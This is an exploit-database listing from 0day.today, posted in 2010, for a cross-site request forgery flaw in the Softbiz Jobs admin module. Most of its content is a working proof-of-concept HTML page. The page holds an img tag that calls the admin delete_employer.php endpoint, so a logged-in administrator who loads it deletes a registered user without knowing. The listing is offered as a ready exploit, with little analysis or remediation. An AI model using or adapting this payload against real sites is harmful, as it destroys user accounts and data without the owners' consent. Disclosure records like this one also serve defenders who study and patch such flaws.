[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Softbiz Jobs CSRF Vulnerability

Author
Pratul Agrawal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11037
Category
web applications
Date add
23-02-2010
Platform
unsorted
===============================
Softbiz Jobs CSRF Vulnerability
===============================

                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in- Admin module
  
# company       aksitservices
  
# Credit by     Pratul Agrawal
 
# Download      http://www.softbizscripts.com/
 
# Script        softbizscripts
 
  
  
# Proof of concept
 
Script to delete the registered user through Cross Site request forgery
 
             ...................................................................................................................
 
                        <html>
 
                          <body>
 
                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
 
                          </body>
 
                        </html>
 
 
             ...................................................................................................................
 
 
 
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 



#  0day.today [2024-12-25]  #